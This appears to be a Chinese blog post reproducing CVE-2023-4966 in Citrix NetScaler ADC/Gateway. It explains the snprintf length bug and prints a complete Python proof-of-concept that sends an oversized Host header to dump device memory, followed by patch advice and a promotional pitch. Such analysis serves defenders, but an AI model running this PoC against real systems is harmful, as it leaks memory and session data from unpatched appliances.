漏洞复现-Citrix 信息泄露漏洞分析(CVE-2023-4966)_cve-2023-4966 复现

于 2024-08-23 11:22:23 发布
阅读量199 收藏 3
点赞数 1
文章标签: ddos nginx apache 运维 学习
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/zzz6583zz/article/details/141461336
版权

1.漏洞描述

Citrix Systems Citrix NetScaler Gateway(Citrix Systems Gateway)和Citrix Systems NetScaler ADC都是美国思杰系统(Citrix Systems)公司的产品。

NetScaler ADC和NetScaler Gateway存在安全漏洞,该漏洞源于存在敏感信息泄露。

2.影响版本

  • NetScaler ADC and NetScaler Gateway 14.1 < 14.1-8.50
  • NetScaler ADC and NetScaler Gateway 13.1 < 13.1-49.15
  • NetScaler ADC and NetScaler Gateway 13.0 < 13.0-92.19
  • NetScaler ADC 13.1-FIPS < 13.1-37.164
  • NetScaler ADC 12.1-FIPS < 12.1-55.300
  • NetScaler ADC 12.1-NDcPP < 12.1-55.300

** 3.影响范围**

4.漏洞分析

这里以 13.0-47 的固件为例子, 从固件拉出 nsppe 这个程序,用 IDA 打开分析。 搜索文章提到的字符串可以看到如下代码:


snprintf函数被用于将hostname参数拼接到print\_temp\_rule变量中,并根据返回的长度,通过ns\_vpn\_send\_response函数返回HTTP请求的结果。这种对snprintf的使用方法是一个常见的错误。这里的hostname参数是由 HTTP 请求中的 Host 头决定的,因此这个参数的长度我们是完全可以控制的。

snprintf 这个函数应该返回的是 ”想要写入buffer 的字符串长度“ , 而不是实际写入buffer的字符长长度。可以从一个 DEMO 看出这个效果:


可以看到,当我想写入 16长度的字符串的时候, n2的值为 16, 而不是实际写入的长度。


另外到达这个函数的路由,通过对这个函数 ns\_aaa\_oauth\_send\_openid\_config
 进行交叉引用一下子就看到了:


Poc:

#!/usr/bin/env python3

import sys
import requests
import urllib3
import argparse
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)

parser = argparse.ArgumentParser()
parser.add_argument('--target', help='The Citrix ADC / Gateway target, excluding the protocol (e.g. 192.168.1.200)')
args = parser.parse_args()

if args.target is None:
    print('Target must be provided (e.g. --target 192.168.1.200)')
    sys.exit(0)

hostname = args.target

if __name__ == "__main__":
    headers = {
        "Host": "a"*24576
    }
    r = requests.get(f"https://{hostname}/oauth/idp/.well-known/openid-configuration", headers=headers, verify=False,timeout=10)
    if r.status_code == 200:
        print("--- Dumped Memory ---")
        print(r.text[131050:])
        print("---      End      ---")
    else:
        print("Could not dump memory")

**5.**修复建议

  • 官方升级

目前官方已发布安全版本修复此漏洞,建议受影响的用户及时升级防护:

https://www.citrix.com/downloads/citrix-gateway/

https://www.citrix.com/downloads/citrix-adc/

最后

从时代发展的角度看,网络安全的知识是学不完的,而且以后要学的会更多,同学们要摆正心态,既然选择入门网络安全,就不能仅仅只是入门程度而已,能力越强机会才越多。

因为入门学习阶段知识点比较杂,所以我讲得比较笼统,大家如果有不懂的地方可以找我咨询,我保证知无不言言无不尽,需要相关资料也可以找我要,我的网盘里一大堆资料都在吃灰呢。

干货主要有:

①1000+CTF历届题库(主流和经典的应该都有了)

②CTF技术文档(最全中文版)

③项目源码(四五十个有趣且经典的练手项目及源码)

④ CTF大赛、web安全、渗透测试方面的视频(适合小白学习)

⑤ 网络安全学习路线图(告别不入流的学习)

⑥ CTF/渗透测试工具镜像文件大全

⑦ 2023密码学/隐身术/PWN技术手册大全

如果你对网络安全入门感兴趣,那么你需要的话可以点击这里👉网络安全重磅福利:入门&进阶全套282G学习资源包免费分享!

扫码领取

程序员鱼
关注
  • 1
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
CVE-2023-6548 和 CVE-2023-65的Citrix Netscaler/ADC-13.0-92.21 最新补丁
01-19
针对CVE-2023-6548 和 CVE-2023-6549 的 NetScaler ADC 和 NetScaler Gateway 的漏洞补丁升级包 CVE-2023-6548 :在管理接口上执行经过身份验证的(低特权)远程代码 CVE-2023-6549:拒绝服务 2、 强烈建议受影响...
Citrix ADC(CVE-2023-3519)版本升级包
07-27
CVE(Common Vulnerabilities and Exposures)是一种标准化的系统,用于识别网络安全漏洞,而CVE-2023-3519是一个特定的漏洞标识符,表明Citrix ADC中存在一处已知的安全问题。 这个版本升级包旨在修复这个安全漏洞...
漏洞复现-Citrix 信息泄露漏洞分析CVE-2023-4966
玄道的网安博客
08-12 1143
snprintf函数被用于将hostname参数拼接到print_temp_rule变量中,并根据返回的长度,通过ns_vpn_send_response函数返回HTTP请求的结果。这里的hostname参数是由 HTTP 请求中的 Host 头决定的,因此这个参数的长度我们是完全可以控制的。snprintf 这个函数应该返回的是 ”想要写入buffer 的字符串长度“ , 而不是实际写入buffer的字符长长度。可以看到,当我想写入 16长度的字符串的时候, n2的值为 16, 而不是实际写入的长度。
CVE-2023-3519 漏洞复现
Jay17的博客
02-13 1779
CVE-2023-3519 漏洞复现
Citrix ADC和Citrix Gateway 远程代码执行漏洞(CVE-2023-3519)修复方案
我在Citrix、VMware、Veeam、微软和NVIDIA等领域拥有丰富经验的专业人士,专注于设计和维护虚拟化基础设施、实施备份与灾难恢复策略,致力于优化企业的IT环境。
07-27 1078
根据安全部门的通知,近日我们监测到Citrix ADC 及 Citrix Gateway 远程代码执行漏洞(CVE-2023-3519),Citrix ADC 及 Citrix Gateway 中存在远程代码执行漏洞,远程未授权攻击者可利用此漏洞在目标设备上执行任意代码。 是您要创建的策略的名称, 是权限的级别,可以是 READ-ONLY、BASIC 或 ALL。1、可根据该漏洞进入之后进入shell模式,进而进一步进入CLI模式。6、升级后重启即可。
CVE-2019-19781 Citrix ADC&NetScaler远程命令执行漏洞
Adminxe的博客
05-05 2998
未经允许,不得擅自转载,违者必究 一、前言 @Adminxe 因为最近在刷edusrc,由此发现这个漏洞,涉及多所高校,所以过来给大家实战POC测试一波,可直接进行命令执行,Citrix产品中的漏洞使80000家公司面临风险,漏洞危害程度:严重!!! 二、漏洞详情 CVE-2019-19781 漏洞可能导致在 NetScaler ADC 或 NetScaler Gate...
Citrix篇】1-Citrix ADC/Gateway 远程代码执行漏洞CVE-2023-3519和升级方法
chen_yunan的博客
08-11 2902
Citrix ADC/Gateway 远程代码执行漏洞CVE-2023-3519和升级方法
用OSINT探测Citrix漏洞:CVE-2022-27510,CVE-2022-27518
rxb0513的博客
01-30 510
登录OSITN搜索引擎criminalip.io ,在Element Analysis上用以下关键词进行搜索,就可以确认外部开放的Citrix服务器统计。这是一篇博客文章,介绍如何用OSINT搜索引擎搜索CVE-2022-27518, CVE-2022-27518。而且这个博客还涉及确认脆弱的Citrix版本的方法和搜索方法,我们可以参考参考。
蓝屏攻击CVE-2012-0002漏洞复现(MS12-020)
轻舟已过万重山
09-22 2560
ms12-020漏洞是指操作系统的远程桌面协议存在重大漏洞,入侵者可以通过向远程桌面默认端口(3389)发一系列特定RDP包,从而获取超级管理员权限,进而入侵系统,因此3389成为突破口。
Citrix篇】2-Citrix ADC/Gateway远程代码执行XSS漏洞修复方案
chen_yunan的博客
08-21 465
Citrix ADC/Gateway远程代码执行XSS漏洞修复方案
CVE-2020-8209(Citrix Endpoint Management )XenMobile-控制台存在任意文件读取漏洞
Adminxe的博客
11-18 604
0x00 前言 XenMobile是Citrix开发的企业移动性管理软件,该产品允许企业管理员工的移动设备和移动应用程序,该软件的目的是通过允许员工安全地在企业拥有的和个人移动设备及应用程序上工作来提高生产率。CVE-2020-8209,路径遍历漏洞。此漏洞允许未经授权的用户读取任意文件,包括包含密码的配置文件。(该软件国外居多,国内基本很少) RP2之前的Citrix XenMobile Server 10.12,RP4之前的Citrix XenMobile Server 10.11,RP6...
CVE-2019-19781 Citrix Application Delivery Controller和RCE.MD
04-13
CVE-2019-19781 Citrix Application Delivery Controller和RCE
CVE-2020-8193:Citrix ADC漏洞
04-14
Citrix ADC漏洞CVE清单如果在代码中添加response_str = json.dumps(r.headers.__dict__['_store'])if r.status_code == 406 and "Content-Disposition" in response_str and r.headers["Accept-Ranges"] == "bytes" ...
Citrix ADC(NSVPX-HyperV-13.0-47.24-)
07-28
Citrix ADC(原名NetScaler ADC)是一款强大的应用交付控制器,专为优化和保护企业级网络及应用程序流量而设计。该软件提供了负载均衡、安全、性能优化和多种云服务等功能,广泛应用于数据中心、混合云和多云环境中...
怎么在网络攻击中屹立不倒
dexun123的博客
08-12 1209
在当今蓬勃发展的网络游戏产业中,服务器安全无疑是企业生存与发展的基石。面对互联网环境中无处不在的DDoS(分布式拒绝服务)与CC(挑战碰撞)攻击威胁,游戏服务器的防御能力与高效处理能力显得尤为重要。相较于追求综合性能平衡的普通服务器,游戏服务器必须专注于构建坚不可摧的安全防线与流畅无阻的游戏体验,以抵御外部侵扰,确保玩家沉浸于无缝的游戏世界。
应急响应-DDOS-典型案例
最新发布
qq_50765147的博客
08-16 661
某单位遭受DDoS攻击事件如下。
应急响应-DDOS-技术指南
qq_50765147的博客
08-16 755
初步预判 通常,可从以下几方面判断服务器/主机是否遭受DDoS攻击 查看防火墙、流量监控设备、网络设备等是否出现安全告警或大量异常数据包。如图所示,通过流量对比,发现在异常时间段存在大量UDP数据包,并且与业务无关。 通过安全设备告警发现存在的攻击,图为安全设备监控到的攻击类型、协议、流量大小等信息 查看是否存在特定的服务、页面请求、使服务器/主机无法及时处理所有正常请求。网页无法正常响应,甚至无法打开。如图所示,管理人员发现网站无法正常访问,随后通过web访
直播App遭受抓包后的DDoS与CC攻击防御策略
@云安全小杜
08-14 792
抓包是指在网络中捕获数据包的过程,攻击者通过这一手段可以窃取敏感信息或者找到系统的弱点。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值